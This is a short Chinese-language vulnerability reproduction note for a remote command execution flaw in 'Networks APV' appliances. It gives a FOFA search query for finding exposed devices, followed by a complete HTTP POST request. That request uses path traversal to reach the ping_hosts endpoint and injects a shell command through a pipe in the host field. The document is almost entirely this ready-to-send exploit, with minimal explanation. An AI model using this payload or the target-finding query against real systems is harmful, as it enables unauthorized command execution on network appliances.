Networks APV存在远程命令执行
一、漏洞简介
<font style="color:rgb(47, 48, 52);">Networks APV存在远程命令执行</font>
二、影响版本
- Networks APV
三、资产测绘
- fofa
body="APV WebUI"
- 特征
四、漏洞复现
POST /restapi/../rest/ping_hosts HTTP/1.1
Host:
Cookie: django_language=en; csrftoken=HhlrckA9OSFlSiM8WKBk9KhbN5hzdJYP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
["baidu.com| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW